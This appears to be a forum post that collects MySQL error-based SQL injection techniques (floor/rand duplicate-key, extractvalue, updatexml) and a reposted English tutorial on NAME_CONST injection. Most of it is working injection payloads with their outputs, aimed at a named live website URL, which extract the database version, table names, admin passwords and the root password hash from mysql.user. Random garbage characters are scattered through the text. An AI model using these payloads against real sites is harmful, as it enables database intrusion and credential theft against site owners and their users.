|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:
; X. f6 z/ K6 U P( A; n% i' k+ a首先进行正常查询: mysql> select * from article where id = 1;
# H. f% R5 o7 W& z4 F, i; A8 [+—-+——-+———+9 m4 F& x$ v% M8 `2 @, \0 B V
| id | title | content |
. R' `/ m) q( y- K. z' o+—-+——-+———+. @' f5 j1 O+ b. c7 Y# ^" r7 _
| 1 | test | do it |* g) B6 `# Z5 |. ?9 Z+ @
+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);1 @) O$ s- {0 j0 Z7 B( ?
ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
+ |7 ?, {! U3 L, B. n例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);1 |5 Z. d1 ~: r
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));/ t' d) F; ?8 C. f: x
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue8 `+ p" n/ M; U4 J8 ^, e
测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
+ N# R4 s( P( ^4 W5 {ERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’
" ]% _5 U+ f2 ?8 t& B4 c0 Q9 s5 j9 w4 D; ?- q6 e' q; Y
再收集:
- S5 }6 e: A3 A3 B3 Thttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) 7 ]$ \* O* a1 [: Z* v& d; W8 L7 o
' E' P! ?! u1 c5 ~+ p) }5 D8 f" GError uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’
! ~, [6 n6 b, s% s( c9 V6 ~+ L& D S T" v, X( f
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)* \' `/ `* r) y5 ^& s# [- C/ T# p. k
( u& N# Z9 R9 y r& r7 l2 p1 O
Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
; K( ?) P Z, v$ V6 h+ [' \9 W, G$ c8 A
MYSQL高版本报错注入技巧-利用NAME_CONST注入1 I5 t6 V; o* s& }( I9 I+ g
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. ; ? r$ R! R8 K
8 b$ U: m# T3 t1 q4 j
1 c' p1 [( Z* T, @0 U; S相关信息
! j1 u4 [ {4 X6 `& B( z
/ q1 I% }8 r. I" |) p, qNAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
% A0 t7 I7 ]8 J, z d* i
& ^% o# g) M: U1 ACode:; y. V* ]( U$ H0 M' S8 B7 d9 }
NAME_CONST(DATA, VALUE)! K0 A) x1 i: h
; p" y& p& V5 S2 L* A( T2 lReturns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.* X5 Z2 h9 u) _
5 D$ A4 e: m0 OSELECT NAME_CONST('TEST', 1)5 r( `1 G; y# ~" c
+ w1 U. V% D! ^2 K2 D* S1 {7 a8 W
5 z2 u- @) Z6 L3 I2 p3 [
$ ~% @( s; t1 ~3 W+ U# c|---------------|
2 w4 B+ ?% z' ~6 n" b% M| TEST |
. O" ~% d+ }7 K$ E| |& }+ ?6 {: m9 g! F
|---------------|. ^& A u$ s# \% F1 r
| 1 |% r6 j$ p0 K- j; Y
| |$ N8 v/ b! o. f5 I r9 S# S
|---------------|2 V5 m! a# D z/ k
1 ?8 N& ^. k& y2 z7 ^' p1 U: M' ^ n4 X2 L4 k/ r {$ k$ `7 q
' V, F7 d6 M4 b6 b* Z" b4 W$ \% X& S3 K2 L8 j! ~
http://dev.mysql.com/doc/refman/5.0/en/m...name-const
$ ~3 w7 k" D4 Y2 M) |8 f2 lIntro to MySQL Variables
; b7 P+ o+ r5 y/ L
% R. S1 F1 u1 W& dOnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
1 @& G' U0 F7 t! c/ h! ~. U; v2 V+ K9 D+ }
Code:
. k. s0 k \) X6 ]5 e( h0 Whttp://www.baido.hk/qcwh/content ... ;sid=19&cid=261; q) K+ d' G" ~9 K: E3 {/ Y
4 H( O' Q* B F7 b" }0 @1 k( B0 _& a4 X z. F0 t" D
0 n6 M3 G( p) _3 E, e( D- d- j. D) L+ J. B# K3 Y8 s
5 |$ G, j5 D: ~( N& b; I8 {( v# dCode:
. t0 c" k. n- D- G/ k h5 C e4 l' Zand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
5 _& L- j, j1 x% k- x
9 e S, G1 w" X7 }2 @* x p. Q1 e- L# {3 z
VAR = Your MySQL variable.
/ A/ a/ l; Q1 y8 D9 ]' b& L. B6 O* a2 `6 d9 w' `# ^* J' F
MySQL 5.1.3 Server System Variables' L( a0 S9 ]/ l( Z! ` u5 ^) r5 \
8 j$ W6 ? Z$ q2 E
Let's try it out on my site..
! ^: w7 O6 Z7 x( ?6 }
. j* C% G8 V3 f* n0 G1 ]. RCode:, v4 h$ _4 B' l. M
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
9 M6 q M0 _( c* K ]
2 v2 n+ d/ r, V0 n& b, @& ^9 hErroruplicate column name '5.0.27-community-nt'
o, S3 @" y& b2 w; W
3 I2 i$ U4 g5 d' g4 U
% j3 Q$ G" M4 _( n% j# A8 L% T3 E4 n# Y/ |4 {2 r
* o5 B8 d/ ], c' F" o( b6 q) A9 Z/ B, E! E6 |6 v
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
2 U+ m: \% C$ ]( B/ N4 N3 `% q8 C6 O0 R6 ~4 t4 i
Data Extraction
$ F( o# \6 G1 P7 t
Z3 F* [' n) YCode:
9 s; B+ T4 C/ p6 R8 ]+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
8 O C2 V( F# h1 k6 u/ O( Z b9 D3 \5 Q: r) m m
5 _& }$ |- B1 U/ @% DWe should get a duplicate column 1 error...& R7 A/ `8 ~( A% ^/ Y+ p% V
! i" r+ [3 I: E7 r
Code:$ g1 W( _9 i" \6 S3 F" J
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
0 C% |1 o# B4 ^+ W* B# Z; |
6 X: r' `) V+ Y. w2 [Erroruplicate column name '1
* S: R( G; G4 e+ ]2 |" ~6 N6 @% ~, v$ \. K, l/ q( |, f4 C
k4 |6 W5 A' l0 J- i9 I( L$ p: ?" S
% Z& d; V! w! L0 f* I
) F2 [5 _' c9 I0 f6 o9 P+ W% D/ S8 U* g% Z' q: H
0 A& ~- v9 C+ F- x5 I" e6 W$ XNow let's get the tables out this bitch..+ ]7 r) O1 W$ s
6 q3 V' H* O3 N' G' U( J8 E5 ACode:
, O$ J ` V, J% M2 m+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
* c6 ]* |8 \4 `6 Q2 X# k) o7 A9 W" l; C% m5 s+ o" Q* S
% R2 x- c8 Q' c
Let's see if it works here, if it does, we can go on and finish the job.
% i" S$ Q/ |+ Z- L3 _1 D( A. @. t# |; D5 @
Code:
9 k) ?3 g; W X J% E( Zhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--; c- o$ }* L1 u4 Y% y" G
, V9 Q. W5 L; c L' q" D: ^0 p" {! D, y9 u' u+ a2 s
Erroruplicate column name 'com_admanage
( n$ ?+ y& l! Q- e/ ?! j# A
; y: g: X* ~0 C7 Y" p
: R0 M) L! I* P3 ^$ o7 j @% w4 r# Y1 h# W6 X
& I. A# m: D3 {4 _
( x" x$ `2 ~9 P
# W$ _' F1 r c
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
/ N6 E$ `$ | g( U
( h2 E. j( V+ O( H, q8 hLet's get the columns out of the user table..( Q+ K# V4 D9 H H* x
) [* d; z' @$ @: O4 d5 QCode:+ d" C, X# t" Q: {! O
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)-- w0 ^! T N& q. F: M
& ?5 @" T/ j0 r" P
- X4 b3 w7 r1 O' d4 B
So mine looks like this, and I get the duplicate column name 'Host'.
+ y T* N4 h- F# v( x
1 L0 A- d; v% ?$ ?7 NCode:
* c+ k! s" y9 |5 ehttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--3 p3 Y6 y8 ?5 e3 J( K4 Y: e' `2 ?
: M+ \ g0 S$ t* h" t8 O! o( bErroruplicate column name 'Host'
7 G# d( D8 w0 ]+ o# |7 J
+ K8 h R5 b+ e) h
/ P A$ w7 t4 u- `6 w
/ L, x/ l4 G6 j$ k# C7 Z8 X% L$ ]+ a8 D- n) `3 S2 V
% k" B$ n- A: b- ] D1 E U: p8 x- A
Woot, time to finish this bitch off.
# u. k+ W4 ^4 c5 `( Z( V
* G# l5 n) K6 f- KCode:
& b% a4 X/ o6 Q7 r+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
7 Q; N2 z- j) ~
% A/ b# m: @3 j: z9 L( P% v& A
* f4 [- S( R7 m: b. e- SSo mine looks like this...
, f$ ^) h$ b* K! s2 M
; H# J1 k; o! vCode: k( s7 w+ f# ^' q4 s
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
2 ]# ]) v; U; H, X* y) p$ Y/ N9 a+ }. B. O% u" ?$ s
Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82': ^0 z! K7 n: ~2 H& S$ r* \# k
4 ?" o; U, T7 J" R1 ], C4 ~, m- O* g R
& p. e- S2 \3 N" F1 i
1 a- C, y3 D- z; M
W+ J1 w! g4 h0 `) }0 c$ k0 ~4 }* A6 R
And there we have it, thanks for reading.2 J% a( ^! y8 ?8 A! W% s" \
1 [; U/ g9 D* R; M
|
发表于 2015-11-11 19:03:37
收藏
支持
反对